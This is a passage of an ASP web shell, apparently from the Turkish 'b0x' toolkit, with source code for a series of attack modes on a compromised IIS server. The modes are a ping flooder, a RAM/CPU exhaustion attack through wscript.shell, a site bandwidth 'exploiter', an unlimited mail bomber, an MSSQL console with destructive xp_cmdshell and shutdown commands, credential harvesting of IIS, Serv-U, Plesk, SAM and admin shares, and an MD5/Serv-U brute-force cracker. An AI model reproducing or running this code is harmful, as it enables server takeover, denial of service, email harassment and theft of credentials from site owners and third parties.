  2213. yazsol("<b>IPCONFIG</b> : Server , PC nin IP bilgileirni, network bilgileirni veriyor. kuln?m i?in - > <b>ipconfig help</b> yaz?n yeterldir ")
  2214. yazorta("<b>by b0x</b>")
  2215. response.write "</center>"
  2216.  
  2217. CASE 30 ' PiNGer BY b0x - Server ?zerinden s?n?rs?z ping sald?rr?s?. =) Coded by b0x
  2218. if not file = "1" then
  2219. response.write "<center><table align=""center"" width=""100%""><tr><td><form action='"&FilePath&"?mode=30&file=1&Path="&Path&"' method='post' name='pingerbye_jder'>"
  2220. yazsol(" Site Ad? : <input style='color=#DAFDD0' name='url' value='sitead?.com' type='text' size=30> (?rnek: google.com) ")
  2221. yazsol(" Ping Say?s? : <input style='color=#DAFDD0' name='inject1' value='20' type='text' size=20> (?rnek: 20) ")
  2222. yazsol(" Ping TimeOut S?resi : <input style='color=#DAFDD0' name='islem' value='750' type='text' size=20> milisaniye (?rnek:750) ")
  2223. yazsol(" Paket Boyutu : <input style='color=#DAFDD0' name='size' value='32' type='text' size=20> byte (32) ")
  2224. response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> <input name='bombalab0x' value=' .:: Bombala ::. ' type='Submit' > </td></tr></table>"
  2225. response.write "</form></td></tr></table>"
  2226. yazsoll(" <font color=#C6FCBE> Not: Bunu kullan?rken girece?iniz Paket boyutu ?nemlidir. M?mk?nce a??r? b?y?k paket girmeyin, ??nk? server yada site nereye sald?rr?yorsan?z, b?y?k paketleri filtreler ve cevap vermezler. O y?zden s?rekli T?meOUT yazar. o y?zden yaa Bo? b?rak?n yada 500 gibi normal bir seviye se?in. <font color=#C6FCBE> <font face=Wingdings size=5>N</font> </font> ")
  2227. yazsoll("<font color=#C6FCBE> Not: P?NG say?s?n? 98 dediniz mesela, Sistem bunu 10 hamlede yapacakt?r. 10 arl? g?nderektir. vede s?reklisayfa kendini yenileyip, 98 olana kadar 10 ar 10 ar ping ee dewam edecektir. Burda T?MEout OLMA gibi sorunumuz yok. 100000 deseniz bile, o bitne kadar gece g?nd?ze ping ?ekebilien sistem geli?tirdim. Korkmadan, vede gece a??k b?rakarak s?n?rs?z pingler ?ekebilirisniz. <font color=#C6FCBE> <font face=Wingdings size=5>N</font></font> ")
  2228. yazsoll(" <font color=#FE7A84> Not: b0x, 5com.tr, gov.tr uzant?l? sitelere kar?? koruma ald?m. Ping Attaker bu sitelere kar?? Cal??t?t?lamaz, ve ?al???t?rlsa bile Ping atmaz, size Uyar? verir. TUrk Siteleri Koruma ilk hedefimizdir. TUrk TUrk ? Vurmaz. by b0x <font color=#C6FCBE> <font face=Wingdings size=5>N</font></font> ")
  2229. yazsoll("<font color=#C6FCBE> <b>Ping Attack b0x</b> taraf?ndan yaz?lm?? olup, biraz hayal g?c?, biraz ?aba azimle, ?u an kulan?d??n?z b0x yuda yazan olarak, bundaki amac?m Server ?n ,sitenin kaynaklar?n? s?m?rmek vede onun ?zerinden onun kaynaklar?n? kullanrak ba?ka yerlerede zarar , sald?r? yapam g?denmi?tir. BUndada BUnlaa ba?lad?m. <b>TUM haklar? b0x e aittir.</b> <font color=#C6FCBE> <font color=#C6FCBE> <font face=Wingdings size=5>N</font></font> ")
  2230. else
  2231. if inject1 = "" then inject1 = 0
  2232. if count = "" then count = 0
  2233. if CInt(inject1) > CInt(count) + 10 then
  2234. Call Ping_Bomb_b0x(url,10,islem,size)
  2235. count = count + 10
  2236. inject2 = ""&FilePath&"?file=1&mode=30&url="&url&"&size="&size&"&count="&count&"&inject1="&inject1&"&islem="&islem&""
  2237. response.write "<META http-equiv=refresh content=2;URL='"&inject2&"'>"
  2238. response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align=""center"" > <b>"&count&"/"&inject1&"</b> tane Ping Cekildi. </td></tr></table>"
  2239. else if CInt(inject1) > CInt(count) then
  2240. Call Ping_Bomb_b0x(url,CInt(inject1) mod 11,islem,size)
  2241. count = count + (CInt(inject1) mod 11)
  2242. yazortaa(" <b>"&count&"/"&inject1&"</b> tane Ping Cekildi... ")
  2243. yazortaa(" Pinger Attack by b0x 1.0 i?lemini tamamlad?... ")
  2244. else
  2245. yazortaa(" <b>"&count&"/"&inject1&"</b> tane Ping Cekildi... ")
  2246. yazortaa(" Pinger Attack by b0x 1.0 i?lemini tamamlad?... ")
  2247. end if
  2248. end if
  2249. end if
  2250.  
  2251. CASE 31 ' Server RAM & CPU Sald?r?s?
  2252. cmdd = array("C:\WINDOWS\System32\mspaint.exe","C:\Program Files\Internet Explorer\iexplore.exe","C:\WINDOWS\system32\notepad.exe")
  2253. if islem = "1" then
  2254. on error resume next
  2255. response.write server.createobject("wscript.shell").exec("cmd.exe /c"&cmdd(0))
  2256. else if islem = "2" then
  2257. on error resume next
  2258. response.write server.createobject("wscript.shell").exec("cmd.exe /c"&cmdd(1))
  2259. else if islem = "3" then
  2260. on error resume next
  2261. response.write server.createobject("wscript.shell").exec("cmd.exe /c"&cmdd(2))
  2262. else
  2263. if not file = "1" then
  2264. response.write "<center><table align=""center"" width=""100%""><tr><td>"
  2265. yazorta("<b> RAM & CPU Sald?r?s? for SERVER by b0x =) 1.0 </b>")
  2266. response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td><font color=#C6FCBE> Server ?n CPu ve RAm kaynaklar?n? 1 dk i?inde t?ketebilen bir b0x eseridir. Bununla sadece, 3 t?r program s?rekli a??l?r ve kapat?lmaz(Paint, Notepad, Explorer) Server en fazla 1 dk i?inde Ram&Cpu sorunu ve kitlenmeler, cevap vermemeler, Status t resetlenme ilede sonu?lanabilir.</font></td></tr></table>"
  2267. yazorta(" <a href='"&FilePath&"?mode=31&file=1'>..:: RAM & CPU Attacker ? CALI?TIR .. by b0x ::..</a> ")
  2268. response.write "</td></tr></table></center>"
  2269. else
  2270. Call Ram_Cpu
  2271. end if
  2272. end if
  2273. end if
  2274. end if
  2275.  
  2276. CASE 32 ' S?te kaynak S?m?r?c? by b0x =)
  2277. if not islem = "1" then
  2278. response.write "<center><table align=""center"" width=""100%""><tr><td>"
  2279. yazorta("<b> S?te Kaynak S?m?c? 1.0 by b0x </b>")
  2280. response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td><form name=""sitefuckerbyb0x"" method='post' action='"&FilePath&"?mode=32'>Site Adresi : <input name='url' value='http://www.siteadi.com' style='color=#C6FCBE' size=55 type='text'></td></tr><tr><td> Robot Say?s? : <input name='file' style='color=#C6FCBE' type='text' value='50' size=30> <input name='islem' type='hidden' value='1'><input name='gooo' value=' ..:: S?m?r ::..' type='Submit'></td></tr></form></table>"
  2281. yazsol("Belirtti?iz kadar Robot kadar ba?lan?r ve siteyi s?m?r?r. Ayr?ca Sald?r? s?rekli kendini g?celler, yeniler. Sonsuzdur. =) Robot u Ba?lant?n?za g?re ayarlay?n. Mesela; Robot u 50 yaparsan?z.O sayfa i?inde 50 tane ayn? anda a??lacak site ve indirecektir siteleri. ve o s?rada s?rekli siz, dosya indiroyr ge?i?i olarak. VE bu olay her 30 snde g?ncelleniyor Otomatik. Birkez ?al???tr ?m?r boyu kapatmazsan penceryi ?al???r bir MAkina.")
  2282. yazsol("Site kodlar?n?, BAndwith ini ve ASP kitlenmesi yada SQL s?m?rmede, ressim, text s?m?rmede USt?ne yoktur..")
  2283. yazorta("TUm haklar? Sakl?d?r by b0x =)")
  2284. response.write "</td></tr></table></center>"
  2285. else
  2286. on error resume next
  2287. yazorta("<b> S?te Kaynak S?m?c? 1.0 by b0x =) 1.0 </b>")
  2288. yazorta("S?m?rme MEkanizmas? Devrede...")
  2289. yazsol("Durdurmak i?in Pencereyi kapat. "&file&" Kadar ba?lan?p 30 sn da g?nceliyor sald?r?y?...")
  2290. yazorta("<b>by b0x</b>")
  2291. Call Somurgen(file,url)
  2292. yazorta(" 20 SN sonra yenileniyor... by b0x =) ")
  2293. response.write "<META http-equiv=refresh content=20;URL='"&FilePath&"?mode=32&islem=1&url="&url&"&file="&file&"'>"
  2294. end if
  2295.  
  2296. CASE 33 ' Mail BOMber by b0x :) TUm Kodlar?n b0x nun HAklar? b0x ya aittir. S?n?rs?z Mail atma imkan? sunuyorum size. K?ya??m? unutmay?n...
  2297. if not islem = "1" then
  2298. response.write "<center><table align=""center"" width=""100%""><tr><td>"
  2299. yazorta("<b> Mail Bomber 1.1 by b0x </b>")
  2300. response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td><form name=""mailbomberbyb0x"" method='post' action='"&FilePath&"?mode=33'>Mail Adresi : <input name='file' value='z1d@b0x.jo' style='color=#C6FCBE' size=55 type='text'></td></tr><tr><td> Bomb Say?s? : <input name='count' style='color=#C6FCBE' type='text' value='50' size=22> <input name='islem' type='hidden' value='1'><input name='gooo' value=' ..:: Bommbala ::..' type='Submit'></td></tr></form></table>"
  2301. yazsol("S?n?rs?z Mail Bomb. Cdonts & Cydos Destekler. %100 inbox. Cyberwarrior.c4om , org, net ,maillerine Bomb yapamazs?n?z.")
  2302. yazorta("TUm haklar? Sakl?d?r by b0x =)")
  2303. response.write "</td></tr></table></center>"
  2304. else
  2305. if request.cookies("bilesen") = "0" then
  2306. if MailKorumasi(file) = 0 then
  2307. if inject1 = "" then inject1 = 0
  2308. if CInt(inject1) + 9 < CInt(count) then
  2309. for j=0 to 10
  2310. Call MailBomber_by_b0x(file)
  2311. next
  2312. inject1 = inject1 + 10
  2313. response.write "<META http-equiv=refresh content=1;URL='"&FilePath&"?mode=33&islem=1&file="&file&"&count="&count&"&inject1="&inject1&"'>"
  2314. response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align=""center"" > <b>"&inject1&"/"&count&"</b> tane Mail G?nderildi... </td></tr></table>"
  2315. else if CInt(inject1) < CInt(count) then
  2316. for j=0 to (count mod 10)
  2317. Call MailBomber_by_b0x(file)
  2318. next
  2319. inject1 = inject1 + (count mod 10)
  2320. yazortaa(" <b>"&inject1&"/"&count&"</b> tane Mail G?nderildi... ")
  2321. yazortaa(" Mail Bomber by b0x 1.0 i?lemini tamamlad?... ")
  2322. else
  2323. yazortaa(" <b>"&inject1&"/"&count&"</b> tane Mail G?nderildi... ")
  2324. yazortaa(" Mail Bomber by b0x 1.0 i?lemini tamamlad?... ")
  2325. end if
  2326. end if
  2327. else
  2328. response.write "<br><br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align=""center"" > <font color=#FE7A84> <font face=Wingdings size=5>N</font> BOMB yap?lamad?. Tasvip etmedi?imiz Bir mail e Sald?rd???n?z i?in. by b0x !!!! <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </td></tr></table>"
  2329. end if
  2330. else
  2331. response.write "<br><br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align=""center"" > <font color=#FE7A84> <font face=Wingdings size=5>N</font> Server Gerekli Olan Cdonts yada Cydos Bilesenlerini desteklemiyor. <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </td></tr></table>"
  2332. end if
  2333. end if
  2334.  
  2335. CASE 34 ' MSSQL - MYSQL Ba?lant? Formu Developed By TurkisH-RuleZ
  2336. if not islem = "1" then
  2337. Call MSSQL_Form
  2338. yazortaa(" E?erki, Sitelerin MSSQL bilgilerini biliyorsan?z, bununla ?ok kolay ba?lanabilir.. ")
  2339. yazortaa(" Tablolar? g?rebilir, ?zerinde SQL komut ?al??t?rabilir, verileri okuyaiblirisniz ")
  2340. yazortaa(" Cok sa?lam ve g??l? bir MSSQL Manager hizmeti Sa?lar size...")
  2341. yazortaa(" <b>by b0x :)</b>")
  2342. else
  2343. Call SQL_menu_by_b0x
  2344. Call Tablolama
  2345. end if
  2346. nolist = True
  2347.  
  2348. CASE 35 ' MSSQL - MYSQL Conneciton i?in Developed By TurkisH-RuleZ
  2349. Call SQL_menu_by_b0x
  2350. Call MSSQL_by_b0x(b0xsql,table)
  2351. nolist = True
  2352.  
  2353. CASE 99 ' b0x WAS HERE - FEEL THE POWER OF TURKS
  2354. 'T?rk Bayra?? Ascii Karakterlerle - Created By b0x :)
  2355. Response.Write "<br><center><table width=80 height=50 cellpadding=0 cellspacing=0><tr><td width=10 align=left valign=middle style=""background-color:AA0000"">&nbsp;</td><td width=70 align=left valign=middle style=""background-color:AA0000""><font size=7 face=Wingdings>Z</font></td></tr></table></center><br>"
  2356. yazorta("<b>Biz Ne yapt?k / What We Do?</b>")
  2357. yazsol("Biz bir b0x & MSWCTools & XMLHTTP Compenent lerini kullanarak Server a site ?zerinden HTTP protocolunden eri?im sa?land???nda, Size Server ?n t?m imkanlar?ndan yararlanman?z i?in, Permission, ?ifre, gizli t?m i?eriklere direk ula?ma, yada a?ma gibi ?zelikleri olan. Server ? ??kertmeye , hatta kaynaklar?n? son damlas?na kullanabilen Cyber-Warrior.CoM ad?na hizmet veren Bir Canavar yaratt?k.")
  2358. yazorta("<b>Ad? ? Name ?</b>")
  2359. yazsol("Bu yaz?l?m b0x yaz?l?m?d?r. Bunun ad? <b>a</b>b0x <b></b>F<b>SO</b> dur. oda k?saca -> <b>b0x'dur</b>")
  2360. yazorta("<b>Biz Kimiz / Who We Are?</b>")
  2361. yazsol("<b><a href=""mailto:b0x@hdsfotmail.com"">b0x</a> : Sitemiz <a href=""http://cyber-warrior.com"" target=_blank"">http://cyber-warrior.com</a></b>")
  2362. olmadi("<b>..:: TAKL?TLER?NDEN SAKININ !!! ::..</b>")
  2363.  
  2364. CASE 36 ' SQL komut YArd?m k?lavuzu by b0x
  2365. yazorta("<b>SQL Komut Yard?m Merkezi by b0x :) </b>")
  2366. yazsoll("<b>SELECT</b> - Se?me&listeleme")
  2367. yazsol("Select * from TABLEADI<br> Select * from TABLEADI where SUTUNADI = DE?ER <br> Select * from tblAdmin where ID = 1")
  2368. yazsoll("<b>INSERT</b> - ekleme")
  2369. yazsol("Insert into TABLOADI (stunisimleri) values (de?eleri)<br> Insert into tblAdmin (Name,Pwd,Gruop) values ('b0x','123456',1)")
  2370. yazsoll("<b>UPDATE</b> - editleme")
  2371. yazsol("Update TABLOADI set stunad? = 'de?eri' where Stunad? = de?eri <br> Update tblAdmin set Name = 'b0x' where ID = 1")
  2372. yazsoll("<b>DELETE</b> - Deleting ")
  2373. yazsol("Delete TABLOADI where Stunad? = de?eri<br>Delete tblAdmin where ID = 1")
  2374. yazsoll("<b>DROP</b> - tabloyu komple Deleting ")
  2375. yazsol("Drop table TABLOADI <br> Drop Table tblAdmin")
  2376. yazsoll("<b>Exes</b> - Fdisk ?ektirmek i?in")
  2377. yazsol("exec xp_cmdshell(?€کfdisk.exe?€™)")
  2378. yazsoll("<b>ShutDown</b> - SQL server kapan?r.")
  2379. yazsol("shutdown with nowait")
  2380.  
  2381. CASE 37 ' Sistem Analizer Developed By TurkisH-RuleZ
  2382. on error resume next
  2383. Set b0xNet = Server.CreateObject("WSCRIPT.NETWORK")
  2384. response.write "<center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td width='300'>"
  2385. yazorta("<b>Server ?n Bilgileri</b>")
  2386. yazsol("OS : <font color=#C6FCBE>"& OS() &"</font>")
  2387. yazsol("PC & Oturum Ad? : <font color=#C6FCBE>\\"& b0xNet.ComputerName &"\"&b0xNet.UserName&"</font>")
  2388. struser = b0xNet.UserName
  2389. yazsol("Server : <font color=#C6FCBE>"&request.servervariables("SERVER_NAME")&"</font>")
  2390. yazsol("IP : <font color=#C6FCBE>"&request.servervariables("LOCAL_ADDR")&"</font>")
  2391. yazsol("HTTPD : <font color=#C6FCBE>"&request.servervariables("SERVER_SOFTWARE")&"</font>")
  2392. yazsol("WebRoot : <font color=#C6FCBE>"&request.servervariables("APPL_PHYSICAL_PATH")&"</font>")
  2393. yazsol("LogRoot : <font color=#C6FCBE>"&request.servervariables("APPL_MD_PATH")&"</font>")
  2394. yazsol("Zaman : <font color=#C6FCBE>"&date()&" - "&time()&"</font>")
  2395. yazsol("HTTPs : <font color=#C6FCBE>"&request.servervariables("HTTPS")&"</font>")
  2396. response.write "</td><td width='350'>"
  2397. yazorta("<b>Server?n Senden Alg?lad?klar?</b>")
  2398. yazsol("IP : <font color=#C6FCBE>"&request.servervariables("REMOTE_ADDR")&"</font>")
  2399. yazsol("Proxy IP : <font color=#C6FCBE>"&request.servervariables("HTTP_X_FORWARDED_FOR")&"</font>")
  2400. yazsol("User Agent : <font color=#C6FCBE>"&request.servervariables("HTTP_USER_AGENT")&"</font>")
  2401. yazsol("Interface : <font color=#C6FCBE>"&request.servervariables("GATEWAY_INTERFACE")&"</font>")
  2402. yazsol("Protocol : <font color=#C6FCBE>"&request.servervariables("SERVER_PROTOCOL")&"</font>")
  2403. yazsol("Method : <font color=#C6FCBE>"&request.servervariables("REQUEST_METHOD")&"</font>")
  2404. yazsol("Via : <font color=#C6FCBE>"&request.servervariables("HTTP_VIA")&"</font>")
  2405. yazsol("Cache Control : <font color=#C6FCBE>"&request.servervariables("HTTP_CACHE_CONTROL")&"</font>")
  2406. response.write "</td></tr></table></center>"
  2407. on error resume next
  2408. Set IIsObject = GetObject ("IIS://localhost/w3svc")
  2409. response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td colspan=2>"
  2410. yazorta("<b>IIS Bilgileri</b>")
  2411. response.write "</td></tr><tr><td width='50%'>"
  2412. yazsol("AnonymousUserName : <font color=#C6FCBE>"&IIsObject.Get("AnonymousUserName")&"</font>")
  2413. yazsol("AnonymousUserPass : <font color=#C6FCBE>"&IIsObject.Get("AnonymousUserPass")&"</font>")
  2414. response.write "</td><td width='50%'>"
  2415. yazsol("WAMUserName : <font color=#C6FCBE>"&IIsObject.Get("WAMUserName")&"</font>")
  2416. yazsol("WAMUserPass : <font color=#C6FCBE>"&IIsObject.Get("WAMUserPass")&"</font>")
  2417. Set IIsObject = Nothing
  2418. response.write "</td></tr><tr><td colspan=2>"
  2419. yazorta("<a href='"&FilePath&"?mode=38&Path="&Path&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">..:: A??klama ??in T?klay?n?z.. by b0x ::..</a>")
  2420. response.write "</td></tr></table></center>"
  2421. strServer = b0xNet.ComputerName
  2422. set objFs = GetObject("WinNT://" _
  2423. & strServer & "/LanmanServer,FileService")
  2424. response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td width=260>"
  2425. yazorta(" <b>Server' in Payla??ma A??k Klas?rleri by b0x </b>")
  2426. yazsol("<a href='"&FilePath&"?Path=//"&strServer&"/C$'>\\"&strServer&"\C$</a>")
  2427. yazsol("<a href='"&FilePath&"?Path=//"&strServer&"/Admin$'>\\"&strServer&"\Admin$</a>")
  2428. For Each objShare In objFs
  2429. yazsol("<a href='"&FilePath&"?Path=//"&strServer&"/"&objShare.name&"'>\\"&strServer&"\"&objShare.name&"</a>")
  2430. Next
  2431. response.write "</td></tr></table></center>"
  2432.  
  2433. response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td>"
  2434. yazorta("<b> Uzakdan Serv-U & GeneFtp & UsersTxT Eri?imi SOnucu by b0x </b>")
  2435. b0xServuRemote()
  2436. yazorta("<b>Geli?mi? Arama i?in</b>")
  2437. yazorta("<a href='"&FilePath&"?Path=C:\Program Files\&hacked=serv&Time="&time&"&mode=23'>Serv_U</a> - <a href='"&FilePath&"?Path=C:\Program Files\&hacked=Daemon&Time="&time&"&mode=23'>Daemon</a> - <a href='"&FilePath&"?Path=C:\&hacked=ws_ftp&Time="&time&"&mode=23'>Ws_Ftp</a> - <a href='"&FilePath&"?Path=C:\&hacked=base.ini&Time="&time&"&mode=23'>Base.ini</a> - <a href='"&FilePath&"?Path=C:\Program Files\&hacked=remote.ini&Time="&time&"&mode=23'>Remote.ini</a>")
  2438. response.write "</td></tr></table></center>"
  2439.  
  2440. response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td>"
  2441. yazorta("<b> Uzakdan PLESK Eri?imi SOnucu by b0x </b>")
  2442. b0xPleskRemote()
  2443. response.write "</td></tr></table></center>"
  2444.  
  2445. On error resume next
  2446. response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td>"
  2447. yazorta("<b> Vti_Pvt/Access.Cnf & Postinfo & ServicePwd Sonucu by b0x</b>")
  2448. b0xVti_Pvt()
  2449. yazorta("<b>Geli?mi? Arama i?in</b>")
  2450. local = request.servervariables("APPL_PHYSICAL_PATH")
  2451. yazorta("<a href='"&FilePath&"?Path="&local&"\..\..\&hacked=access.cnf&Time="&time&"&mode=23'>access.cnf</a> - <a href='"&FilePath&"?Path="&local&"\..\..\&hacked=postinfo&Time="&time&"&mode=23'>postinfo</a> - <a href='"&FilePath&"?Path="&local&"\..\..\&hacked=service.pwd&Time="&time&"&mode=23'>service</a>")
  2452. response.write "</td></tr></table></center>"
  2453.  
  2454. On error resume next
  2455. response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td>"
  2456. yazorta("<b> NTUser.Dat - Log - ?ni Eri?im Sonucu by b0x </b>")
  2457. b0xaNTUser(struser)
  2458. response.write "</td></tr></table></center>"
  2459.  
  2460. On error resume next
  2461. response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td>"
  2462. yazorta("<b> Config Klas?r Eri?im Sonucu by b0x</b>")
  2463. b0xsam()
  2464. response.write "</td></tr></table></center>"
  2465. Call Status
  2466.  
  2467.  
  2468. On error resume next
  2469. response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td>"
  2470. yazorta("<b> Repair Klas?r Eri?im Sonucu by b0x</b>")
  2471. b0xRepair()
  2472. response.write "</td></tr></table></center>"
  2473. Call Status
  2474.  
  2475. nolist = True
  2476.  
  2477. CASE 38 ' IIS bilgi Alan? by b0x
  2478. yazsol("W?ndows Server lardaki, himeti sunan, IIS servisi, sizi AnonymousUserName ve o ?ifre ile tan?r. Sizin yetkiniz o kullan?c?dad?r. ")
  2479. yazsoll("IIS i?inde ise, o siteninde BEllekdeki Oturum ad?da -> WAMUserName ad?nda ve ?ifresine sahiptir.")
  2480. yazsoll("Bu Sistem Geli?tirilmeye Devam ediyor? ")
  2481.  
  2482. CASE 39 ' Se?mece bunlar MD5- servu =) by b0x
  2483. response.write "<br><br><br><br><br><center><table width='100%' bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td><form action='"&FilePath&"?mode=40' method=post>"
  2484. yazorta("<b> K?rmak ?stedi?in T?r? Se?</b>")
  2485. yazorta("<input name='islem' style='color=#C6FCBE' value=' ..:: MD5 ::.. ' type='Submit'> <input name='islem' style='color=#C6FCBE' value=' ..:: Serv-U ::.. ' type='Submit'>")
  2486. response.write "</form></td></tr></table></center>"
  2487. yazsol("<b>MD5 :</b> Bildi?iniz ?zere, bir ?ok sistemin kulland??? bir ?ifreleme olay?d?r. 128 bittir.")
  2488. yazsol("<b>Serv-U :</b> Server larda Host lar?n kulland??? bir programd?r. Kolay vede kullan??l? oldu?u i?in Hostlar taraf?ndna tercih edilir. i?inde Ftp ?ifreleri bar?nd?rmakdad?r. burdada o ?ifreleri k?rmaktad?r.")
  2489. yazsoll("<font color=#C6FCBE >Bizde burda ASP tabanl? vede b0x i?ine injecte edip Sizlere Server ?n CPU ve RAM ini kullanarak , Daha h?zl? ve zahmetsiz, T?meOUT suz bir ?ekilde ?ifreleirni k?rman?z? sa?layaca??z. Bu K?rma i?lemi BRUTE attackl modelidir. K?sacas? K?rma olas??? e?er ki sabreder ve ?ans?n?z varsa ?ok k?sa s?rede k?rars?n?z. Ama aksi halde 1 g?n ge?sede =) yinede %100 k?rm?a garantisi vard?r. E?er derleri do?ru girerseniz.</font>")
  2490. yazortaa("Md5 & Serv-U KOd Converted by <b>Fastboy</b>")
  2491. Yazorta("Brute And HJACk Algorithms Written by <b>b0x</b>")
  2492.  
  2493. CASE 40 ' Md5 & Serv-U Algortitmas? Ba?l?yor S?k? tutnun =) sak?n duda??n?z u?uklama?sn haa =) by b0x euheuh ?ok yordu be kafam? bu olay .. neyse ??zd?k yine =) eeheuh by b0x
  2494. response.write "<center><table width='100%' bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td><form action='"&FilePath&"?mode=41' method=post>"
  2495. if islem = " ..:: MD5 ::.. " then
  2496. yazorta("<b> __== MD5 Cracker by b0x ==__ </b>")
  2497. else
  2498. yazorta("<b> __== Serv-U Cracker by b0x ==__ </b>")
  2499. end if
  2500. if islem = " ..:: MD5 ::.. " then
  2501. yazsol("MD5 Kodu Girin 1 : <input style='color=#C6FCBE' size='54' name='Usersmd5' value='Hash kod u giriniz ??z?lecek olan.' type='text'>")
  2502. else
  2503. yazsol("Serv-u Ham Kodu Girin 1 : <input style='color=#C6FCBE' size='45' name='Usersmd5' value='Hash kod u giriniz ??z?lecek olan.' type='text'>")
  2504. yazsol("Salt Kodu : <input style='color=#C6FCBE' size='30' name='salt' value='ww' type='text'>")
  2505. end if
  2506. response.cookies("mdd") = ""
  2507. response.cookies("hash1") = ""
  2508. response.cookies("hash2") = ""
  2509. response.cookies("hash3") = ""
  2510. response.cookies("hash4") = ""
  2511. response.cookies("hash5") = ""
  2512. response.cookies("hash6") = ""
  2513. response.cookies("hash7") = ""
  2514. response.cookies("hash8") = ""
  2515. response.cookies("hash9") = ""
  2516. response.cookies("hash10") = ""
  2517. yazsol("Hash 2 : <input style='color=#C6FCBE' size='54' name='hash2' value='' type='text'>")
  2518. yazsol("Hash 3 : <input style='color=#C6FCBE' size='54' name='hash3' value='' type='text'>")
  2519. yazsol("Hash 4 : <input style='color=#C6FCBE' size='54' name='hash4' value='' type='text'>")
  2520. yazsol("Hash 5 : <input style='color=#C6FCBE' size='54' name='hash5' value='' type='text'>")
  2521. yazsol("Hash 6 : <input style='color=#C6FCBE' size='54' name='hash6' value='' type='text'>")
  2522. yazsol("Hash 7 : <input style='color=#C6FCBE' size='54' name='hash7' value='' type='text'>")
  2523. yazsol("Hash 8 : <input style='color=#C6FCBE' size='54' name='hash8' value='' type='text'>")
  2524. yazsol("Hash 9 : <input style='color=#C6FCBE' size='54' name='hash9' value='' type='text'>")
  2525. yazsol("Hash 10 : <input style='color=#C6FCBE' size='54' name='hash10' value='' type='text'>")
  2526. yazsol("?ifre Aral??? : <input style='color=#C6FCBE' size='5' name='ara1' value='5' type='text'> ile <input style='color=#C6FCBE' size='5' name='ara2' value='18' type='text'> aras?nda...")
  2527. yazsol("Deneme Say?s? : <input style='color=#C6FCBE' size='5' name='inject1' value='100' type='text'> (1 keredeki deneme say?s?)")
  2528. yazsoll("<b>CharSet i se?iniz;</b>")
  2529. yazsol("<input name='k1' value='k1' type='checkbox' checked > ABCDEFGHIJKLMNOPQRSTUVWXYZ")
  2530. yazsol("<input name='k2' value='k2' type='checkbox' > abcdefghijklmnopqrstuvwxyz")
  2531. yazsol("<input name='k3' value='k3' type='checkbox' checked > 0123456789")
  2532. yazsol("<input name='k4' value='k4' type='checkbox' > !@#$%^&*()-_+=~`[]{}|\:;<>,.?/")
  2533. yazsol("Bekleme S?resi : <input style='color=#C6FCBE' name='waiting' value='2' type='text' size='5'> saniye")
  2534. yazorta("<input name='mode' value='41' type='hidden'><input name='md5kirgecirmahvetb0x' style='color=#C6FCBE' value=' __== K?rmaya Ba?la ==__ ' type=submit>")
  2535. response.write "</td></tr></form></table></center>"
  2536. if islem = " ..:: MD5 ::.. " then
  2537. yazsol("<b>MD5 Kodu Girin :</b> MD5 HASh ?ifrenizi giriniz oraya.. maksimum 10 Hash girebilirsiniz.")
  2538. else
  2539. yazsol("<b>Serv-u Ham Kodu Girin :</b> Serv-u Kodunun ilk 2 karakteri SALT dur. egri kalan? ise MD5 halidir. Oraya ilk 2 karakteri ??kar?n ve geri kalan? yaz?n. altasa da SALT k?sm?nada, ilk 2 karakteri yaz?n. Max 10 Hash girebilirsiniz.")
  2540. end if
  2541. yazsol("<b>?ifre Aral??? :</b> Burda belirtilen aral?klar aras?nda ?ifre ?retip, denemeye ba?l?cakt?r. ?nce k???kden ba?lay?p, t?m charset denemsini yapt?kdan sonra, aral?k bir artacakt?r, taaki sizin ?st s?n?ra kadar girdi?iniz.")
  2542. yazsol("<b>CharSet i se?iniz; </b> ?ifre denerkenki, ?ifre karakterleridir. B?y?k k???k harf ?nemlidir. Birden FAzla da se?ebilriisniz. Ama unutmay?nki, Deneme say?s? b?y?d?k?e, Zamanda ARTACAKTIR. ")
  2543. yazsol("<b>Bekleme S?resi :</b> S?rekli md5 deneme yaparsa sistem, b?y?k bir oranda Cpu kullan?r. Cpu kullan?m? rahatlatmak i?in vede timeout u ?nlemek i?in , her bir Charset uzunlu?u kadar deneyip, sonra yenileme yap?yor. o s?radaki bekleme s?residir bu.")
  2544. yazsol("<b>NOT :</b> Toplu Md5&ServU k?rmak m?mk?n. Hepsini birden kulland???n?zda verim artacakt?r. HIZ da d???? olmaz. Ama sizin Daha kolay k?rman?z? sa?lar, Coklu k?rma.")
  2545.  
  2546. CASE 41 ' MD5 deneniyorrrrrr by b0x
  2547. ' yerel de?i?kenelrim
  2548. on error resume next
  2549. if request.cookies("mdd") = "0" or request.cookies("mdd") = "" then
  2550. session("say") = 1
  2551. Call Cookyaz("hash1","has1",Usersmd5)
  2552. Call Cookyaz("hash2","has2",hash2)
  2553. Call Cookyaz("hash3","has3",hash3)
  2554. Call Cookyaz("hash4","has4",hash4)
  2555. Call Cookyaz("hash5","has5",hash5)
  2556. Call Cookyaz("hash6","has6",hash6)
  2557. Call Cookyaz("hash7","has7",hash7)
  2558. Call Cookyaz("hash8","has8",hash8)
  2559. Call Cookyaz("hash9","has9",hash9)
